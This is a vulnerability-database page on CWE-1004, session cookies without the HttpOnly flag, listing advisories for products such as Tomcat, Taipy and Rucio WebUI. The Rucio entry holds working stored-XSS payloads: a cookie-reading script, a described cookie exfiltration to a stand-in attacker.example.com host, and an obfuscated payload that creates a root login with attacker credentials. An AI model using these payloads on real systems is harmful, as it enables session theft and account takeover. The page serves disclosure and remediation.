Common Weakness Enumeration

CWE-1004

Allowed

Sensitive Cookie Without 'HttpOnly' Flag

Abstraction: Variant · Status: Incomplete

The product uses a cookie to store sensitive information, but the cookie is not marked with the HttpOnly flag.

70 vulnerabilities reference this CWE, most recent first.

GHSA-PVJH-7H8Q-Q56R

Vulnerability from github – Published: 2022-05-14 02:42 – Updated: 2024-02-07 23:37
VLAI
Summary
Apache Tomcat has cookies without HTTPOnly flag in Set-Cookie header
Details

The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.tomcat:tomcat"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.0.35"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2010-4312"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-07T23:37:52Z",
    "nvd_published_at": "2010-11-26T20:00:00Z",
    "severity": "MODERATE"
  },
  "details": "The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.",
  "id": "GHSA-pvjh-7h8q-q56r",
  "modified": "2024-02-07T23:37:52Z",
  "published": "2022-05-14T02:42:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-4312"
    },
    {
      "type": "WEB",
      "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=608286"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/tomcat"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.net/bugs/cve/CVE-2010-4312"
    },
    {
      "type": "WEB",
      "url": "https://security-tracker.debian.org/tracker/CVE-2010-4312"
    },
    {
      "type": "WEB",
      "url": "https://ubuntu.com/security/CVE-2010-4312"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Apache Tomcat has cookies without HTTPOnly flag in Set-Cookie header"
}

GHSA-PVXG-5348-RXVF

Vulnerability from github – Published: 2024-07-15 06:30 – Updated: 2024-07-15 06:30
VLAI
Details

The session cookie in MailGates and MailAudit from Openfind does not have the HttpOnly flag enabled, allowing remote attackers to potentially steal the session cookie via XSS.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-6739"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-732",
      "CWE-79"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-15T04:15:02Z",
    "severity": "MODERATE"
  },
  "details": "The session cookie in MailGates and MailAudit from Openfind does not have the HttpOnly flag enabled, allowing remote attackers to potentially steal the session cookie via XSS.",
  "id": "GHSA-pvxg-5348-rxvf",
  "modified": "2024-07-15T06:30:53Z",
  "published": "2024-07-15T06:30:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6739"
    },
    {
      "type": "WEB",
      "url": "https://www.openfind.com.tw/taiwan/download/Openfind_OF-ISAC-24-007.pdf"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-7928-04e8a-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-7927-03837-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QJP8-WWQ5-32HP

Vulnerability from github – Published: 2025-05-08 18:30 – Updated: 2025-05-08 21:32
VLAI
Details

An issue was discovered in Znuny through 7.1.3. A cookie is set without the HttpOnly flag.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26844"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-08T16:15:25Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Znuny through 7.1.3. A cookie is set without the HttpOnly flag.",
  "id": "GHSA-qjp8-wwq5-32hp",
  "modified": "2025-05-08T21:32:55Z",
  "published": "2025-05-08T18:30:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26844"
    },
    {
      "type": "WEB",
      "url": "https://www.znuny.com"
    },
    {
      "type": "WEB",
      "url": "https://www.znuny.org/en/advisories/zsa-2025-05"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R3JQ-4R5C-J9HP

Vulnerability from github – Published: 2024-08-27 19:50 – Updated: 2025-01-21 18:28
VLAI
Summary
Taipy has a Session Cookie without Secure and HTTPOnly flags
Details

Summary

Session cookie is without Secure and HTTPOnly flags.

Details

Please take a look at this part of code (PoC screenshot) or check code directly (provided in Occurrences section below)

Occurrences: https://github.com/Avaiga/taipy/blob/develop/frontend/taipy-gui/src/components/Taipy/Navigate.tsx#L67

Proposed remediation: add Secure and HTTPOnly flags for cookies.

It could be like this: document.cookie = tprh=${tprh};path=/;Secure;HttpOnly;;

PoC

Screenshot: image

Impact

Secure: This flag indicates that the cookie should only be sent over secure HTTPS connections. Without this flag, the cookie will be sent over both HTTP and HTTPS connections, which could expose it to interception or tampering if the connection is not secure. HttpOnly: This flag prevents the cookie from being accessed by client-side JavaScript. It helps mitigate certain types of attacks, such as cross-site scripting (XSS), by preventing malicious scripts from accessing the cookie's value.

References CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute https://cwe.mitre.org/data/definitions/614.html CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag - https://cwe.mitre.org/data/definitions/1004.html OWASP - Secure Cookie Attribute - https://owasp.org/www-community/controls/SecureCookieAttribute Cookie security flags - https://www.invicti.com/learn/cookie-security-flags/ Cookie lack Secure flag - https://support.detectify.com/support/solutions/articles/48001048982-cookie-lack-secure-flag

Other: Title: Encrypting the Web URL: https://www.eff.org/encrypt-the-web

Update (Required advisory information) - added severity, resource: https://portswigger.net/kb/issues/00500200_tls-cookie-without-secure-flag-set

Best regards,

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "taipy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47833"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-319",
      "CWE-614"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-27T19:50:59Z",
    "nvd_published_at": "2024-10-09T19:15:14Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSession cookie is without Secure and HTTPOnly flags.\n\n### Details\nPlease take a look at this part of code (PoC screenshot) or check code directly (provided in Occurrences section below)\n\n**Occurrences**:\nhttps://github.com/Avaiga/taipy/blob/develop/frontend/taipy-gui/src/components/Taipy/Navigate.tsx#L67\n\n**Proposed remediation:** add Secure and HTTPOnly flags for cookies.\n\nIt could be like this:\ndocument.cookie = `tprh=${tprh};path=/;Secure;HttpOnly;`;\n\n\n### PoC\n**Screenshot**:\n![image](https://github.com/Avaiga/taipy/assets/18367606/ea7d1bbd-ba27-447f-932b-3d33ffc1a2e7)\n\n\n### Impact\n**Secure**: This flag indicates that the cookie should only be sent over secure HTTPS connections. Without this flag, the cookie will be sent over both HTTP and HTTPS connections, which could expose it to interception or tampering if the connection is not secure.\n**HttpOnly:** This flag prevents the cookie from being accessed by client-side JavaScript. It helps mitigate certain types of attacks, such as cross-site scripting (XSS), by preventing malicious scripts from accessing the cookie\u0027s value.\n\n**References**\n    CWE-614: Sensitive Cookie in HTTPS Session Without \u0027Secure\u0027 Attribute https://cwe.mitre.org/data/definitions/614.html\n    CWE-1004: Sensitive Cookie Without \u0027HttpOnly\u0027 Flag - https://cwe.mitre.org/data/definitions/1004.html\n    OWASP - Secure Cookie Attribute - https://owasp.org/www-community/controls/SecureCookieAttribute\n    Cookie security flags - https://www.invicti.com/learn/cookie-security-flags/\n    Cookie lack Secure flag - https://support.detectify.com/support/solutions/articles/48001048982-cookie-lack-secure-flag\n\n**Other**:\nTitle: Encrypting the Web\nURL: https://www.eff.org/encrypt-the-web\n\nUpdate (Required advisory information) - added severity, resource: \nhttps://portswigger.net/kb/issues/00500200_tls-cookie-without-secure-flag-set\n\nBest regards,",
  "id": "GHSA-r3jq-4r5c-j9hp",
  "modified": "2025-01-21T18:28:45Z",
  "published": "2024-08-27T19:50:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Avaiga/taipy/security/advisories/GHSA-r3jq-4r5c-j9hp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47833"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Avaiga/taipy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Avaiga/taipy/blob/develop/frontend/taipy-gui/src/components/Taipy/Navigate.tsx#L67"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/taipy/PYSEC-2024-168.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Taipy has a Session Cookie without Secure and HTTPOnly flags"
}

GHSA-RWJ9-7J48-9F7Q

Vulnerability from github – Published: 2026-02-25 18:58 – Updated: 2026-02-27 21:50
VLAI
Summary
Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function
Details

Summary

A stored Cross-site Scripting (XSS) vulnerability was identified in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.


Details

A malicious payload supplied in the comment field is stored by the backend. When the rule is later viewed or approved, the stored script executes in the WebUI origin.

Create Path:
Monitoring > Subscriptions and Rules > Request New Rule > Options > Add Comment

Trigger Paths:
- User Trigger: Monitoring > Subscriptions and Rules > Show My Rules > RULE NAME
(https://localhost:8443/ui/rule?rule_id=<RULE_ID>) - Admin Trigger: Data Transfer (R2D2) > Approve Rules > RULE NAME

Create Request

POST /proxy/rules/ HTTP/1.1
...
{"dids":[{"scope":"test","name":"dataset1"}],"account":"pentest","ask_approval":true,"activity":"User Subscriptions","rse_expression":"WEB1","copies":1,"grouping":"DATASET","lifetime":15552000,"comment":"<script>alert(document.cookie)</script>","asynchronous":false,"notify":"N"}

Response

HTTP/1.1 201 CREATED
...
["c2d675c1979d4549b26eede3531a7e6a"]

Creating RSE with XSS payload in comment Creating RSE with XSS payload in comment

Reviewing rule creation requests Reviewing rule creation requests

XSS Payload triggering on rule review XXS Payload triggering on rule review


Impact

Any authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.

The impact is amplified by: - Session cookies that are accessible to JavaScript (missing HttpOnly flag). - API tokens exposed to the WebUI via JavaScript variables.

An attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

Attackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.

XSS Payload to Create Root UserPass

<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>

Remediation / Mitigation

All client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as .html() should be avoided unless the content is explicitly sanitized. Safer alternatives include .text(), creating text nodes, or using a templating system that enforces automatic escaping.

Additional defense-in-depth measures include: - Enforcing a strict Content Security Policy (CSP). - Setting the HttpOnly flag on session cookies. - Avoiding exposure of API tokens in JavaScript-accessible variables.

Note that many pages were found setting the API token as token in an authenticated response like var token = "root-root-webui-...:" (See /ui/list_accounts for example)


Resources

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "35.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "36.0.0rc1"
            },
            {
              "fixed": "38.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "39.0.0rc1"
            },
            {
              "fixed": "39.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25733"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:58:20Z",
    "nvd_published_at": "2026-02-25T20:23:47Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA malicious payload supplied in the `comment` field is stored by the backend. When the rule is later viewed or approved, the stored script executes in the WebUI origin.\n\n**Create Path**:  \nMonitoring \u003e Subscriptions and Rules \u003e Request New Rule \u003e Options \u003e Add Comment\n\n**Trigger Paths**:  \n- **User Trigger**: Monitoring \u003e Subscriptions and Rules \u003e Show My Rules \u003e *RULE NAME*  \n  (`https://localhost:8443/ui/rule?rule_id=\u003cRULE_ID\u003e`)\n- **Admin Trigger**: Data Transfer (R2D2) \u003e Approve Rules \u003e *RULE NAME*\n\n**Create Request**\n```http\nPOST /proxy/rules/ HTTP/1.1\n...\n{\"dids\":[{\"scope\":\"test\",\"name\":\"dataset1\"}],\"account\":\"pentest\",\"ask_approval\":true,\"activity\":\"User Subscriptions\",\"rse_expression\":\"WEB1\",\"copies\":1,\"grouping\":\"DATASET\",\"lifetime\":15552000,\"comment\":\"\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\",\"asynchronous\":false,\"notify\":\"N\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\n[\"c2d675c1979d4549b26eede3531a7e6a\"]\n```\n\n**Creating RSE with XSS payload in comment**\n\u003cimg width=\"1032\" height=\"667\" alt=\"Creating RSE with XSS payload in comment\" src=\"https://github.com/user-attachments/assets/00258839-5288-48ed-856c-30cfee19d3c4\" /\u003e\n\n**Reviewing rule creation requests**\n\u003cimg width=\"1201\" height=\"625\" alt=\"Reviewing rule creation requests\" src=\"https://github.com/user-attachments/assets/1b5fc7af-a664-42dc-a3d4-b00755fe2bd7\" /\u003e\n\n**XSS Payload triggering on rule review**\n\u003cimg width=\"1197\" height=\"417\" alt=\"XXS Payload triggering on rule review\" src=\"https://github.com/user-attachments/assets/463e843a-1e9e-492e-960f-7d3edac2fd1e\" /\u003e\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)",
  "id": "GHSA-rwj9-7j48-9f7q",
  "modified": "2026-02-27T21:50:07Z",
  "published": "2026-02-25T18:58:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25733"
    },
    {
      "type": "WEB",
      "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rucio/rucio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function"
}

GHSA-W9QP-XC8F-8XCQ

Vulnerability from github – Published: 2024-07-26 12:35 – Updated: 2024-08-06 15:30
VLAI
Details

This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing HTTPOnly flag for the session cookies associated with the router's web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.

Successful exploitation of this vulnerability could allow the attacker to capture cookies and obtain sensitive information on the targeted system.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-41685"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-26T12:15:02Z",
    "severity": "MODERATE"
  },
  "details": "This vulnerability exists in SyroTech SY-GPON-1110-WDONT Router due to missing HTTPOnly flag for the session cookies associated with the router\u0027s web management interface. An attacker with remote access could exploit this by intercepting transmission within an HTTP session on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to capture cookies and obtain sensitive information on the targeted system.",
  "id": "GHSA-w9qp-xc8f-8xcq",
  "modified": "2024-08-06T15:30:48Z",
  "published": "2024-07-26T12:35:49Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41685"
    },
    {
      "type": "WEB",
      "url": "https://cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2024-0225"
    },
    {
      "type": "WEB",
      "url": "https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01\u0026VLCODE=CIVN-2024-0225"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-WPW2-69V8-6F9H

Vulnerability from github – Published: 2024-09-25 03:30 – Updated: 2024-09-25 03:30
VLAI
Details

IBM Aspera Console 3.4.0 through 3.4.4 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-43845"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-09-25T01:15:32Z",
    "severity": "LOW"
  },
  "details": "IBM Aspera Console 3.4.0 through 3.4.4 could allow a remote attacker to obtain sensitive information, caused by the failure to set the HTTPOnly flag. A remote attacker could exploit this vulnerability to obtain sensitive information from the cookie.",
  "id": "GHSA-wpw2-69v8-6f9h",
  "modified": "2024-09-25T03:30:35Z",
  "published": "2024-09-25T03:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-43845"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7169766"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-X7XC-36FH-7MVR

Vulnerability from github – Published: 2025-10-27 18:31 – Updated: 2025-10-28 15:30
VLAI
Details

TRUfusion Enterprise through 7.10.4.0 exposes the encrypted COOKIEID as an authentication mechanism for some endpoints such as /trufusionPortal/getProjectList. However, the application uses a static key to create the encrypted cookie, ultimately allowing anyone to forge cookies and gain access to sensitive internal information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-27223"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-27T17:15:37Z",
    "severity": "HIGH"
  },
  "details": "TRUfusion Enterprise through 7.10.4.0 exposes the encrypted COOKIEID as an authentication mechanism for some endpoints such as /trufusionPortal/getProjectList. However, the application uses a static key to create the encrypted cookie, ultimately allowing anyone to forge cookies and gain access to sensitive internal information.",
  "id": "GHSA-x7xc-36fh-7mvr",
  "modified": "2025-10-28T15:30:42Z",
  "published": "2025-10-27T18:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27223"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2025-27223.txt"
    },
    {
      "type": "WEB",
      "url": "https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise"
    },
    {
      "type": "WEB",
      "url": "https://www.rocketsoftware.com/products/rocket-b2b-supply-chain-integration/rocket-trufusion-enterprise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XJ56-Q6PV-VRX6

Vulnerability from github – Published: 2022-12-21 18:30 – Updated: 2022-12-28 21:30
VLAI
Details

Sensitive Cookie Without 'HttpOnly' Flag in GitHub repository lirantal/daloradius prior to master.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-4630"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-12-21T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Sensitive Cookie Without \u0027HttpOnly\u0027 Flag in GitHub repository lirantal/daloradius prior to master.",
  "id": "GHSA-xj56-q6pv-vrx6",
  "modified": "2022-12-28T21:30:22Z",
  "published": "2022-12-21T18:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4630"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lirantal/daloradius/commit/6878619dc661b3009429777a1aeeb383ddc0166b"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/401661ee-40e6-4ee3-a925-3716b96ece5c"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XXWW-73XW-X3FJ

Vulnerability from github – Published: 2023-06-13 06:30 – Updated: 2024-04-04 04:45
VLAI
Details

Sensitive Cookie Without 'HttpOnly' Flag vulnerability in ABB REX640 PCL1 (firmware modules), ABB REX640 PCL2 (Firmware modules), ABB REX640 PCL3 (firmware modules) allows Cross-Site Scripting (XSS).This issue affects REX640 PCL1: from 1.0;0 before 1.0.8; REX640 PCL2: from 1.0;0 before 1.1.4; REX640 PCL3: from 1.0;0 before 1.2.1.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2876"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-732"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-13T04:15:10Z",
    "severity": "MODERATE"
  },
  "details": "Sensitive Cookie Without \u0027HttpOnly\u0027 Flag vulnerability in ABB REX640 PCL1 (firmware modules), ABB REX640 PCL2 (Firmware modules), ABB REX640 PCL3 (firmware modules) allows Cross-Site Scripting (XSS).This issue affects REX640 PCL1: from 1.0;0 before 1.0.8; REX640 PCL2: from 1.0;0 before 1.1.4; REX640 PCL3: from 1.0;0 before 1.2.1.\n\n",
  "id": "GHSA-xxww-73xw-x3fj",
  "modified": "2024-04-04T04:45:06Z",
  "published": "2023-06-13T06:30:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2876"
    },
    {
      "type": "WEB",
      "url": "https://search.abb.com/library/Download.aspx?DocumentID=2NGA001423\u0026LanguageCode=en\u0026DocumentPartId=\u0026Action=Launch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Leverage the HttpOnly flag when setting a sensitive cookie in a response.

No CAPEC attack patterns related to this CWE.